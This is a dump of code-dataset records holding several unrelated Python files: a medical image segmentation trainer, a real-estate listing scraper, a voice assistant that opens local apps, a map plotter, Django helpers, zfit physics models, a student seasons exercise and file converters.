parser.add_option('--test_cp',default='',type=str)\n\n (options, args) = parser.parse_args()\n return options\n\nargs = get_args()\nresult_path_global = '/mnt/HDD1/Frederic/Segmentation/fcn_baseline/'+args.arch+'_result/'\nmake_path(result_path_global)\ndef train_net(net,\n epochs=5,\n batch_size=2,\n lr=0.0001,\n save_cp=True,\n gpu=True,\n target_path = '',\n checkpoint_path='/mnt/HDD1/Frederic/Segmentation/fcn_baseline/'\n ):\n\n#Set path to store checkpoint\n dir_checkpoint = checkpoint_path+args.arch+'checkpoints/'\n result_path = result_path_global\n make_path(dir_checkpoint)\n#Print training details\n print('''\n Get Start, training details:\n Epochs: {}\n Batch size: {}\n Learning rate: {}\n Checkpoints: {}\n CUDA: {}\n '''.format(epochs, batch_size, lr, str(save_cp), str(gpu)))\n\n#loss function and optimizer\n optimizer = optim.SGD(net.parameters(),lr=lr,momentum=0.9)\n\n criterion = nn.CrossEntropyLoss()\n # criterion = nn.BCELoss()\n\n#Train iteration\n logger = Logger(result_path+'log.txt',title = 'ISIC2016_U_Net')\n logger.set_names(['Epochs','Avg_Trainning_Loss','Val_Dice_coefficient'])\n#load data\n val_sets = load_validation_data()\n start_epoch = args.start_epoch\n best_dice,best_epoch=0,0\n for epoch in range(start_epoch,start_epoch + epochs):\n net.train()\n #use epoch_loss to store total loss for whole iteration\n trainloader,datasize = load_train_data(args.batchsize)\n epoch_loss = 0\n if epoch ==75 or epoch==150 or epoch ==225:\n lr = lr*0.1\n optimizer = optim.SGD(net.parameters(),lr=lr,momentum=0.9)\n with tqdm(total = datasize/batch_size) as pbar:\n for ite,data in enumerate(trainloader[0]):\n imgs = data[0]\n true_masks = data[1]\n \n if gpu:\n imgs = imgs.cuda()\n true_masks = true_masks.cuda()\n\n masks_pred = net(imgs)\n true_masks = true_masks.squeeze(dim=1) \n # loss = DiceLoss(masks_pred,true_masks)\n loss = criterion(masks_pred,true_masks.long())\n epoch_loss += loss.item()\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n #set bar for training\n pbar.set_description('Epoch:[%d|%d],loss: %.4f ' % (epoch + 1,args.epochs+start_epoch,loss))\n pbar.update(1)\n \n avg_loss = epoch_loss / ite\n print('Epoch finished ! Loss: {}'.format(avg_loss))\n\n # save the sample output every 40 epochs\n save_sample_mask = False\n if (epoch+1)%50 ==0:\n save_sample_mask = True \n val_dice = eval_net(net, val_sets,epoch,gpu,save_sample_mask,result_path)\n print('Validation Dice Coeff: {}'.format(val_dice))\n logger.append([epoch+1,epoch_loss / ite,val_dice])\n\n #save best epoch and checkpoint\n if best_dice < val_dice:\n best_dice = val_dice\n best_epoch = epoch \n torch.save(net.state_dict(),\n dir_checkpoint+ 'best_checkpoint.pth')\n \n print('best checkpoint is epoch {} with dice {} '.format(best_epoch,best_dice))\n #save normal epoch\n if save_cp and (epoch+1)%50==0: \n torch.save(net.state_dict(),\n dir_checkpoint + 'CP{}.pth'.format(epoch + 1))\n # print('Checkpoint {} saved !'.format(epoch + 1))\n\n #plot fig after train\n logger.close()\n logger.plot()\n # savefig(os.path.join(result_path, 'log.eps'))\n return dir_checkpoint\n\ndef DiceLoss(input, target):\n #self.save_for_backward(input, target)\n eps = 0.0001\n t = 0\n input = input[:,1,:,:]\n inter = torch.dot(input.contiguous().view(-1),target.contiguous().view(-1))\n union = torch.sum(input) + torch.sum(target) + eps\n\n t = (1-(2 * inter.float() + eps) / union.float())\n return t\n\ndef dice_loss(pred, target, smooth = 1.):\n pred = pred.contiguous()\n target = target.contiguous() \n\n intersection = (pred * target).sum(dim=2).sum(dim=2)\n \n loss = (1 - ((2. * intersection + smooth) / (pred.sum(dim=2).sum(dim=2) + target.sum(dim=2).sum(dim=2) + smooth)))\n \n return loss.mean()\n\ndef get_model_structure(model,input_size,path):\n arch = summary(model,input_size)\n os.path.open(path,'w')\n#main function of train process\n\n\ndef load_model(arch):\n if arch =='fcn8s':\n VGG_model = VGGNet(requires_grad = True,remove_fc = True)\n net = FCN8s(pretrained_net = VGG_model,n_class = 2)\n elif arch== 'unet_resnet34':\n net = smp.Unet('resnet34',encoder_weights=None, classes=2)\n elif arch =='deeplab':\n net = smp.DeepLabV3('resnet50',encoder_weights='imagenet',classes=2)\n elif arch== 'unet_resnet50_pre':\n net = smp.Unet('resnet50',encoder_weights='imagenet', classes=2)\n elif arch== 'unet_resnet101_pre':\n net = smp.Unet('resnet101',encoder_weights='imagenet', classes=2)\n elif arch== 'unet_resnet50':\n net = smp.Unet('resnet50',encoder_weights=None, classes=2)\n elif arch== 'unet_resnet101':\n net = smp.Unet('resnet101',encoder_weights=None, classes=2)\n elif arch== 'unet_vgg_pre':\n net = smp.Unet('vgg16_bn',encoder_weights='imagenet', classes=2)\n elif arch== 'unet_vgg':\n net = smp.Unet('vgg16_bn',encoder_weights=None, classes=2)\n return net\n\nif __name__ == '__main__':\n\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id\n # net = UNet(n_channels = 3,n_classes=2)\n # get_model_structure(net,(3,224,224))\n # net = vnet.VNet(elu=False, nll=nll)\n net = load_model(args.arch)\n\n#Use checkpoint\n if args.load:\n net.load_state_dict(torch.load(args.load))\n print('Model loaded from {}'.format(args.load))\n\n if args.gpu:\n net.cuda()\n cudnn.benchmark = True \n\n if args.test:\n testloader = load_test_data()\n best_checkpoint = args.test_cp\n test_net(net = net,\n dataset = testloader,\n checkpoint = best_checkpoint,\n gpu = args.gpu,\n result_path = result_path_global)\n \n if not args.test:\n try:\n dir_cp = train_net(net=net,\n epochs=args.epochs,\n batch_size=args.batchsize,\n lr=args.lr,\n gpu=args.gpu,\n )\n\n testloader = load_test_data()\n best_checkpoint = dir_cp+'best_checkpoint.pth'\n test_net(net = net,\n dataset = testloader,\n checkpoint = best_checkpoint,\n gpu = args.gpu,\n result_path = result_path_global)\n except KeyboardInterrupt:\n torch.save(net.state_dict(), 'INTERRUPTED.pth')\n print('Saved interrupt')\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)","sub_path":"Medical_Image_Segmentation/train_FCN_Unet.py","file_name":"train_FCN_Unet.py","file_ext":"py","file_size_in_byte":8926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"102353765","text":"# Used to parse HTML\nfrom bs4 import BeautifulSoup\n\n# Standard lib for regex\nimport re\n\n# Lib to Execute https request and execute the javascript (without open a window)\nimport sys\nfrom PyQt5.QtWidgets import QApplication\nfrom PyQt5.QtCore import QUrl\nfrom PyQt5.QtWebEngineWidgets import QWebEnginePage\n\nfrom datetime import datetime, date, timedelta, time\n\n\nclass Page(QWebEnginePage):\n def __init__(self, url):\n self.app = QApplication(sys.argv)\n QWebEnginePage.__init__(self)\n self.html = ''\n self.loadFinished.connect(self._on_load_finished)\n self.load(QUrl(url))\n self.app.exec_()\n\n def _on_load_finished(self):\n self.html = self.toHtml(self.Callable)\n\n def Callable(self, html_str):\n self.html = html_str\n self.app.quit()\n\n\ndef get_info(annonce, today_datetime, today_date, size):\n \"\"\"This function extract all the informations for one ad of type ''\n \"\"\"\n\n id_ = annonce.get('data-id')\n prix = annonce.find('div', class_='%s-price rangePrice' % size)\n\n if prix:\n prix = prix.text\n # Create a list with all the different price\n prix = [int(re.sub('[.]', '', item)) for item in re.findall(r'[0-9.]*', prix) if item != '']\n\n # est_nouveau will be True if there is only one price\n est_nouveau = True if len(prix) == 1 else False\n else:\n prix = []\n est_nouveau = True\n\n sur_ch = annonce.find('div', class_='%s-surface-ch' % size).text\n sur, ch = None, None\n\n # split by 'm', if there isn't 'm' in sur_ch -> tmp = [sur_ch]\n tmp = sur_ch.split('m')\n\n if len(tmp) == 2:\n # get the surface\n sur = [int(re.sub('[.]', '', item)) for item in re.findall(r'[0-9.]*', tmp[0]) if item != ''][0]\n\n # select the string where the information about the rooms is present\n tmp = tmp[1] if len(tmp) == 2 else tmp[0]\n tmp = tmp.split('c')\n if len(tmp) == 2:\n # get the number of rooms\n ch = [int(re.sub('[.]', '', item)) for item in re.findall(r'[0-9.]*', tmp[0]) if item != ''][0]\n\n # strip() remove all invisible charachter at the begging and end of a string\n typ = annonce.find('div', class_='title-bar-left').text.strip()\n commune = annonce.find('div', class_='title-bar-right').text.strip()\n\n # find the zip code\n code_postal = int(re.match(r'[0-9]{4}', commune)[0])\n\n # remove the zip code\n nom_commune = re.sub(r'^%i ' % code_postal, '', commune)\n\n heures, minutes = list(map(int, annonce.find('div', class_='prix-heure').text.split('h')))\n\n if heures > today_datetime.hour:\n heure = datetime.combine(today_date - timedelta(1), time(hour=heures, minute=minutes))\n else:\n heure = datetime.combine(today_date, time(hour=heures, minute=minutes))\n\n lien = annonce.a.get('href')\n\n return {'id': id_,\n 'prix': prix,\n 'surface': sur,\n 'chambres': ch,\n 'est_nouveau': est_nouveau,\n 'code_postal': code_postal,\n 'nom_commune': nom_commune,\n 'date': heure,\n 'lien': lien,\n 'type': typ}\n\n\ndef get_lastest_ads(number_pages=1):\n sizes = ['m', 'l', 'xl']\n today_date = date.today()\n today_datetime = datetime.now()\n\n annonces_json_dict = dict()\n annonces_json_list = list()\n\n for i in range(1, number_pages + 1):\n # Get the HTML for the last real estate ad\n url = 'https://www.immoweb.be/fr/recherche/dernieres-annonces-immobilieres-publiees/a-vendre?page=%i'\n client_response = Page(url)\n html_source = client_response.html\n\n # create the BeautifulSoup object from the html\n soup = BeautifulSoup(html_source)\n\n # Get only the part with the real estate ad\n annonces = soup.find('div', {\"id\": \"result\"})\n\n # Iterate over the different ad of type 'result-m'\n for size in sizes:\n for i, annonce in enumerate(annonces.findAll('div', class_='result-%s' % size)):\n infos = get_info(annonce, today_datetime, today_date, size)\n annonces_json_dict[infos['id']] = infos\n annonces_json_list.append(infos)\n\n return annonces_json_list, annonces_json_dict\n","sub_path":"modules/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"577014189","text":"import os\r\nimport pyttsx3\r\nimport datetime\r\n\r\ntoday = datetime.date.today()\r\n\r\npyttsx3.speak(\"Hello user, please provide your name\")\r\na = input(\"Enter your name : \")\r\nprint()\r\nprint(\"Hello \"+ a)\r\npyttsx3.speak(\"Hello\"+a)\r\npyttsx3.speak(\"I am Jarvis\")\r\npyttsx3.speak(\"I am an AI Assistant and can perform a few tasks for you !\")\r\nprint(\"I am Jarvis and I am an AI Assitant and can perform a few tasks for you !\")\r\npyttsx3.speak(\"Today's Date is :\")\r\npyttsx3.speak(today)\r\nprint(\"Today's Date is :\")\r\nprint(today)\r\n\r\n\r\npyttsx3.speak(\"I will help you to, open Chrome, Windows Media Player, Calculator, Notepad, Control Panel, Settings. If you want, I can also open Lightroom , Spotify or Zoom App for you\")\r\npyttsx3.speak(\"So, tell me\"+a+\"what can I do for you ? \")\r\n\r\n\r\nwhile True:\r\n p=input(\"Kindly give me a task to perform : \")\r\n p=p.lower()\r\n \r\n \r\n if((\"do not\" not in p) and (\"dont\" not in p) and (\"don't\" not in p)) and (((\"run\" in p) or (\"execute\" in p) or (\"open\" in p))\r\nand ((\"chrome\" in p) or (\"browser\" in p) or (\"search engine\" in p) or (\"google\" in p))):\r\n pyttsx3.speak(\"Opening Google Chrome\")\r\n os.system(\"chrome\")\r\n\r\n \r\n\r\n elif((\"do not\" not in p) and (\"dont\" not in p) and (\"don't\" not in p)) and (((\"run\" in p) or (\"execute\" in p) or (\"open\" in\r\np)) and ((\"player\" in p) or (\"media player\" in p) or (\"audio player\" in p) or (\"video player\" in p))):\r\n pyttsx3.speak(\"Opening Windows Media Player\")\r\n os.system(\"wmplayer\")\r\n\r\n\r\n\r\n elif((\"do not\" not in p) and (\"dont\" not in p) and (\"don't\" not in p)) and (((\"run\" in p) or (\"execute\" in p) or (\"open\" in\r\np)) and ((\"editor\" in p) or (\"notepad\" in p) or (\"text editor\" in p) or (\"writer\" in p))):\r\n pyttsx3.speak(\"Opening Notepad\")\r\n os.system(\"notepad\")\r\n\r\n\r\n elif((\"do not\" not in p) and (\"dont\" not in p) and (\"don't\" not in p)) and (((\"open\" in p) or (\"run\" in p) or (\"execute\" in\r\np)) and ((\"control panel\" in p) or (\"hardware settings\" in p) or (\"software settings\" in p) or (\"user control settings\" in p)\r\nor (\"controlpanel\" in p))):\r\n pyttsx3.speak(\"Opening Control Panel\")\r\n os.system(\"control panel\")\r\n\r\n\r\n elif((\"do not\" not in p) and (\"dont\" not in p) and (\"don't\" not in p)) and (((\"open\" in p) or (\"run\" in p) or (\"want\" in\r\np)) and ((\"lightroom\" in p) or (\"edit\" in p) or (\"picture\" in p))):\r\n pyttsx3.speak(\"Opening Adobe Lightroom\")\r\n os.system(\"lightroom\")\r\n\r\n\r\n elif((\"do not\" not in p) and (\"dont\" not in p) and (\"don't\" not in p)) and (((\"open\" in p) or (\"run\" in p) or (\"execute\" in\r\np)) and ((\"computer settings\" in p) or (\"settings\" in p) or (\"pc settings\" in p))):\r\n pyttsx3.speak(\"Opening System Settings\")\r\n os.system(\"start ms-settings:\")\r\n\r\n\r\n\r\n elif((\"do not\" not in p) and (\"dont\" not in p) and (\"don't\" not in p)) and (((\"open\" in p) or (\"play\" in p) or (\"want\" in\r\np)) and ((\"spotify\" in p) or (\"music\" in p) or (\"song\" in p))):\r\n pyttsx3.speak(\"Opening Spotify\")\r\n os.system(\"spotify\")\r\n\r\n\r\n\r\n elif((\"do not\" not in p) and (\"dont\" not in p) and (\"don't\" not in p)) and (((\"open\" in p) or (\"play\" in p) or (\"want\" in\r\np)) and ((\"calculator\" in p) or (\"add\" in p) or (\"subtract\" in p) or (\"multiply\" in p) or (\"divide\" in p) or (\"numbers\" in p))):\r\n pyttsx3.speak(\"Opening Calculator\")\r\n os.system(\"calc\")\r\n\r\n\r\n\r\n elif((\"do not\" not in p) and (\"dont\" not in p) and (\"don't\" not in p)) and (((\"run\" in p) or (\"execute\" in p) or (\"open\" in p))\r\nand ((\"video call\" in p) or (\"zoom app\" in p) or (\"zoom\" in p) or (\"video conference\" in p))):\r\n pyttsx3.speak(\"Opening Zoom App\")\r\n os.system(\"zoom\")\r\n \r\n\r\n\r\n elif(\"exit\" in p) or (\"close\" in p) or (\"quit\" in p):\r\n pyttsx3.speak(\"Thank you Sir, goodbye, have a nice day ahead\")\r\n print(\"Thank you Sir, goodbye, have a nice day ahead.\")\r\n break\r\n\r\n\r\n else:\r\n pyttsx3.speak(\"I don't know how to do this\")\r\n print(\"Try again !\")","sub_path":"Jarvis.py","file_name":"Jarvis.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"539464343","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 21 12:41:08 2015\r\n\r\n@author: admin\r\n\"\"\"\r\n\r\nimport csv\r\nfrom mpl_toolkits.basemap import Basemap\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport os\r\nfrom random import randint\r\nfrom os import makedirs\r\nfrom os.path import exists\r\n\r\n\r\n \r\n# Open the earthquake data file.\r\nfilename = 'C:/Users/admin/Dropbox/Gotham/Parking/RulesGeoloc/'\r\npathDest = 'C:/Users/admin/Documents/PlanetWorld/MapClustersRulesParking/'\r\n\r\nif not exists(pathDest):\r\n makedirs(pathDest)\r\n\r\n# Create empty lists for the data we are interested in.\r\nlats, lons = [], []\r\nrayons = []\r\ncolorList = np.asarray(['go','ro','bo'])\r\ncompte = 0\r\n\r\n\r\n\r\nListFiles = os.listdir(filename)\r\nListAllClusters = []\r\nfor fileCluster in ListFiles:\r\n idCluster = fileCluster.find('_Rule')\r\n ListAllClusters.append(fileCluster[0:idCluster])\r\n\r\nListClusters = np.unique(ListAllClusters)\r\n\r\nListFiles = np.asarray(ListFiles)\r\nfor Cluster in ListClusters:\r\n IdCluster = np.nonzero(np.in1d(ListAllClusters,Cluster))[0]\r\n ListFilesCluster = ListFiles[IdCluster]\r\n \r\n latC, longC = Cluster.split('_')\r\n latC = float(latC)\r\n longC = float(longC)\r\n \r\n numRule = 0\r\n for filerule in ListFilesCluster:\r\n\r\n plt.figure(figsize=(16,12))\r\n \r\n eq_map = Basemap(projection='merc', resolution = 'h', area_thresh = 1.0,\r\n llcrnrlon= longC - 30, llcrnrlat= latC - 25,\r\n urcrnrlon= longC + 30, urcrnrlat= latC + 25)\r\n eq_map.drawcoastlines()\r\n eq_map.drawcountries()\r\n eq_map.fillcontinents(color = 'gray')\r\n eq_map.drawmapboundary()\r\n eq_map.drawmeridians(np.arange(0, 360, 30),labels=[0,0,0,1])\r\n eq_map.drawparallels(np.arange(-90, 90, 30),labels=[1,0,0,0])\r\n \r\n cl = colorList[randint(0,2)]\r\n \r\n x,y = eq_map(longC, latC)\r\n eq_map.plot(x, y, 'yo', markersize = 20)\r\n \r\n f = filename + filerule\r\n with open(f) as lf:\r\n # Create a csv reader object.\r\n reader = csv.reader(lf)\r\n # Ignore the header row.\r\n # Store the latitudes and longitudes in the appropriate lists.\r\n numrow = 0\r\n for row in reader:\r\n if numrow != 0:\r\n lats.append(float(row[0]))\r\n lons.append(float(row[1]))\r\n #rayons.append(float(row[0]))\r\n # Min & Max des longitudes et latitudes:\r\n longiMax = np.max(lons)\r\n longiMin = np.min(lons)\r\n latiMax = np.max(lats)\r\n latiMin = np.min(lats)\r\n numrow += 1\r\n compte += 1\r\n\r\n for lon, lat in zip (lons, lats):\r\n x,y = eq_map(lon, lat)\r\n eq_map.plot(x, y, cl, markersize= 10)\r\n \r\n \r\n title_string = \"Hadrian Marine : Rule \" + str(numRule) + \" of Cluster \" + Cluster\r\n plt.title(title_string)\r\n \r\n plt.savefig(pathDest + Cluster + '_Rule_' + str(numRule) + '.png')\r\n \r\n numRule += 1\r\n","sub_path":"Marine/MarineBasemap.py","file_name":"MarineBasemap.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"250871797","text":"from django.db import models\nfrom django.db.models import Sum, F\nfrom django.db.models.functions import Coalesce\n\nfrom KlimaKar.functions import normal_round\n\n\nclass SingletonModel(models.Model):\n class Meta:\n abstract = True\n\n def save(self, *args, **kwargs):\n self.pk = 1\n super().save(*args, **kwargs)\n\n def delete(self, *args, **kwargs):\n pass\n\n @classmethod\n def load(cls):\n obj, created = cls.objects.get_or_create(pk=1)\n return obj\n\n\nclass TotalValueQuerySet(models.QuerySet):\n def total(self, price_type=None):\n price_field = self.model.PRICE_FIELD\n if price_type:\n price_field = \"{}_{}\".format(price_field, price_type)\n value = self.aggregate(\n total=Coalesce(\n Sum(\n F(price_field) * F(self.model.QUANTITY_FIELD),\n output_field=models.DecimalField(),\n ),\n 0,\n output_field=models.DecimalField(),\n )\n )[\"total\"]\n return normal_round(value, 2)\n\n def order_by_total(self, is_descending=True, price_type=None):\n price_field = self.model.PRICE_FIELD\n if price_type:\n price_field = \"{}_{}\".format(price_field, price_type)\n return self.annotate(\n total=Coalesce(\n Sum(\n F(price_field) * F(self.model.QUANTITY_FIELD),\n output_field=models.DecimalField(),\n ),\n 0,\n output_field=models.DecimalField(),\n )\n ).order_by(\"{}total\".format(\"-\" if is_descending else \"\"))\n","sub_path":"KlimaKar/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"562034244","text":"import zfit\nimport zfit_physics as zphysics\n\n# signal models -----------------------------------------\nZMASS = zfit.Parameter('mass', 91.1876, floating=False)\nZWIDTH = zfit.Parameter('width', 2.4952, floating=False)\n\n# resolution functions -----------------------------------------\n\ndef get_func(obs, name):\n if name == \"bw\":\n return zphysics.pdf.RelativisticBreitWigner(obs=obs, m=ZMASS, gamma=ZWIDTH)\n\ndef get_resolution(name, category=\"\"):\n if name == \"gauss\":\n return zfit.pdf.Gauss(\n obs=zfit.Space('x', (-10., 10.)), \n mu=zfit.Parameter('sig_mu_{0}'.format(category), 0, -2.5, 2.5), \n sigma=zfit.Parameter('sig_sigma_{0}'.format(category), 2, 0.1, 5))\n elif name == \"cb\":\n return zfit.pdf.CrystalBall(\n obs=zfit.Space('x', (-10., 10.)), \n mu=zfit.Parameter('sig_mu_{0}'.format(category), 0, -2.5, 2.5), \n sigma=zfit.Parameter('sig_sigma_{0}'.format(category), 2, 0.1, 5),\n alpha=zfit.Parameter('sig_alpha_{0}'.format(category), 5, 0, 20),\n n=zfit.Parameter('sig_n_{0}'.format(category), 5,0.5,10),\n ) \n\n\ndef get_signal(obs, func=\"bw\", resolution=\"gauss\", category=\"\"):\n \n func = get_func(obs, func)\n\n if resolution == None:\n return func\n \n return zfit.pdf.FFTConvPDFV1(func, get_resolution(resolution, category), obs=obs, interpolation=\"spline:3\")\n\n# background models -----------------------------------------\n\ndef get_background(obs, func=\"exp\", category=\"\"):\n\n if func == \"uniform\":\n return zfit.pdf.Uniform(obs=obs)\n elif func == \"exp\":\n return zfit.pdf.Exponential(zfit.Parameter('bkg_lambda_{0}'.format(category), -0.01, -0.5, 1.0), obs=obs)\n elif func == \"chebyshev\":\n return zfit.pdf.Chebyshev(coeffs=[zfit.Parameter('bkg_{0}_{1}'.format(i, category), 0.0, -1.0, 1.0) for i in range(3)], obs=obs)\n","sub_path":"ZHarvester/zfit/zfit_models.py","file_name":"zfit_models.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"395883813","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# <nav class=\"navbar navbar-default\">\n# <div class=\"container-fluid\">\n# <div class=\"navbar-header\">\n# <a class=\"navbar-brand\" href=\"_Oving2.ipynb\">Assignment 2</a>\n# </div>\n# </div>\n# </nav>\n# \n# # Seasons\n# \n# **Learning goals**\n# - Conditions\n# - Logical expressions\n# \n# **Starting Out with Python:**\n# - Kap. 3.3-3.5\n# \n# In this assignment, a user must enter the day and month and find out what season the date belongs to.\n# \n# One year has (officially) four seasons, and in this assignment we assume that the season changes follow the table below. \n# **(Note the dates) **\n# \n# \n# Season | First day\n# --- | ---\n# Spring | 20. mar\n# Summer | 21. jun\n# Autumn | 22. sep\n# Winter | 21. dec\n\n# **Task:** Create a program that takes in a month as a string and a day in that month as a number from the user. The program will then print out the season associated with this date.\n# \n# You can assume that the input is a valid date.\n# \n# **Example run:**\n# ```\n# Month: mar\n# Day: 20\n# Spring\n# ``` \n# \n# ```\n# Month: mar\n# Day: 19\n# Winter\n# ``` \n# \n# ```\n# Month: nov\n# Day: 20\n# Autumn\n# ```\n# \n# ___Write your code here:___\n\n# In[ ]:\n\n\nmon = input('Month: ')\nday = int(input('Day: '))\nif mon == 'mar' :\n if day >= 20 : \n print('Spring')\n else:\n print('Winter')\nelif mon in [apr, may]:\n print('Spring')\nelif mon == 'jun':\n if day < 21:\n print('Spring')\n else: \n print('Summer')\n \nelif mon in ['jul', 'aug']:\n print('Summer')\nelif mon == 'sep':\n if day < 22:\n print('Summer')\n elif day >= 22: \n print('Autumn')\n \nelif mon in ['oct', 'nov']: \n print('Autumn')\nelif mon == 'dec':\n if day < 21:\n print('Autumn')\n else:\n print('Winter')\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"tdt4127/Aarstider(ENG).py","file_name":"Aarstider(ENG).py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"228480977","text":"#coding=utf-8\nimport cv2\nimport numpy as np\nimport glob\nimport sys\nimport os\n\ndef findMarginalPoint(contour):\n return (contour[:,:,1]).min(),(contour[:,:,1]).max(),(contour[:,:,0]).min(),(contour[:,:,0]).max()\n\ndef getCancerPartsFromImage(srcPath,labelPath):\n src = cv2.imread(srcPath,0)\n label = cv2.imread(labelPath,0)\n if(len(src) == 0 or len(label) == 0):\n print(\"Not enough src image or not enough lable image!\")\n exit(1)\n if(np.shape(src) != np.shape(label)):\n print(\"assert \\\"src.width == label.widht && src.height == label.height \\\" failed!\")\n exit(-1)\n\n (_, contours, _)=cv2.findContours(label,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\n outputImages = []\n for contour in contours:\n left,right,top,bottom = findMarginalPoint(contour)\n if((left < 0 or top < 0) and (right >np.shape(src)[0] or bottom > np.shape(src)[1]) ):\n continue\n if(left == right or top == bottom):\n continue\n tempSrc = src.copy()\n tempImage = np.zeros(np.shape(src))\n cv2.drawContours(tempImage,[contour],0,255,-1)\n for i in range(len(tempImage)):\n for j in range(len(tempImage[i])):\n if(tempImage[i][j] == 0):\n tempSrc[i][j] = 0\n outputImages.append(tempSrc[left:right,top:bottom])\n cv2.imshow(\"contourImage\",tempSrc[left:right,top:bottom])\n cv2.waitKey(1)\n return outputImages\n\ndef getCancerPartsFromBatchImages(folderPath,outputPath=\"\",writeToFile = True):\n imgPathes = glob.glob(folderPath+\"//img//*\")\n labelPathes = glob.glob(folderPath+\"//label//*\")\n if(len(imgPathes)==0 or len(labelPathes)==0):\n print(r\"The folder structure should like this: floderPath\\\\img\\\\*.tif floderpath\\\\label\\\\*.tif\")\n return\n allCancerParts = []\n total = len(imgPathes)\n index = 1\n for imagePath,labelPath in zip(imgPathes,labelPathes):\n print(\"Dealing with the %dth/%d image...\"%(index,total))\n index += 1\n allCancerParts.extend(getCancerPartsFromImage(imagePath,labelPath))\n if writeToFile:\n for index,img in enumerate(allCancerParts):\n cv2.imwrite(outputPath+\"//\"+str(index)+\".tif\",img)\n return allCancerParts\ndef main():\n argv = sys.argv\n if (len(argv) < 3):\n print(\"usage: python ExtractCancerCell.py folderPath outputPath writeToFile,\")\n print(r\"The folder structure should like this: floderPath\\\\img\\\\*.tif floderpath\\\\label\\\\*.tif\")\n exit(1)\n folderPath = argv[1]\n outputPath = argv[2]\n if not os.path.exists(outputPath):\n os.makedirs(outputPath)\n getCancerPartsFromBatchImages(folderPath, outputPath, writeToFile=True)\n\nif __name__ == \"__main__\":\n main()\n exit(0)","sub_path":"sample/extract_cancer_cell.py","file_name":"extract_cancer_cell.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"246332721","text":"#!/usr/bin/env python3\n\n\"\"\"Shimadzu SPC file bulk converter.\n\nFinds all spc file in the given directory and converts them to CSV.\nSee https://github.com/uri-t/shimadzu-spc-converter for more details\n\nUsage:\n spc_bulk_convert.py <directory>\n spc_bulk_convert.py -h | --help\n\nOptions:\n -h --help Show this screen.\n\"\"\"\nfrom docopt import docopt\nfrom pathlib import Path\nfrom getSpectrum import main\n\nif __name__ == '__main__':\n arguments = docopt(__doc__, version='Naval Fate 2.0')\n \n directory = arguments['<directory>']\n # recursively iterate all items matching the glob pattern\n for spc_file in Path(directory).rglob('*'):\n # .suffix property refers to .ext extension\n ext = spc_file.suffix\n # use the .lower() method to get lowercase version of extension\n if ext.lower() == \".spc\":\n spc_file = str(spc_file)\n\n with open(spc_file, 'rb') as f:\n signature = f.read(4)\n\n if signature == b'\\xD0\\xCF\\x11\\xE0':\n main(spc_file)\n print('converted ' + spc_file)\n else:\n print('Not OLE CF type file format, skipping: ' + spc_file)\n\n","sub_path":"spc_bulk_convert.py","file_name":"spc_bulk_convert.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"133422259","text":"import os\nimport glob\nimport csv\nfrom xlsxwriter.workbook import Workbook\n\nfilepath = r\"O:/Medical Informatics-General/2018 iPatientCare Data Extracts/2018_07_02 - Copy/\"\nfilepathsave = r\"O:\\\\Medical Informatics-General\\\\2018 iPatientCare Data Extracts\\\\Test\\\\\"\nconvertfolder = r\"2018_07_02 - Copy\\\\\"\n\nfor csvfile in glob.glob(os.path.join(filepath, '*.csv')):\n print(csvfile)\n workbook = Workbook(csvfile[:-4] + '.xlsx')\n worksheet = workbook.add_worksheet()\n with open(csvfile, 'rt') as f:\n reader = csv.reader(f)\n for r, row in enumerate(reader):\n for c, col in enumerate(row):\n worksheet.write(r, c, col)\n workbook.close()","sub_path":"General Python Codes/convert_csv.py","file_name":"convert_csv.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"136892071","text":"# Author : Iman Kianian\n# 1 January 2021\nfrom State import State\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nclass gameboard(object):\n def setupUi(self, window,epsilon,gamma,livingreward,firereward,diamondreward):\n window.setObjectName(\"Form\")\n self.Form=window\n Form = QtWidgets.QWidget(window)\n Form.setFixedHeight(5*100)\n Form.setFixedWidth(5*100)\n Form.setObjectName(\"centralwidget\")\n Form.setStyleSheet(\"border:1px dashed black;\")\n self.gridLayout_2 = QtWidgets.QGridLayout(Form)\n self.gridLayout_2.setObjectName(\"gridLayout_2\")\n self.maketable(epsilon,gamma,livingreward,firereward,diamondreward)\n window.setCentralWidget(Form)\n self.retranslateUi(window)\n QtCore.QMetaObject.connectSlotsByName(window)\n\n def retranslateUi(self, Form):\n _translate = QtCore.QCoreApplication.translate\n Form.setWindowTitle(_translate(\"Form\", \"Grid World Game - Game Board\"))\n\n def maketable(self,epsilon,discount,livingreward,firereward,diamondreward):\n actions=['Right','Left','Up','Down']\n v=[]\n v_=[[],[],[]]\n def predictnext(rowindex,columnindex,direction): # predict next state after doing a work ( Successor Function )\n if direction=='Right' and (columnindex==3 or (rowindex==1 and columnindex==0)) :\n return (rowindex,columnindex)\n elif 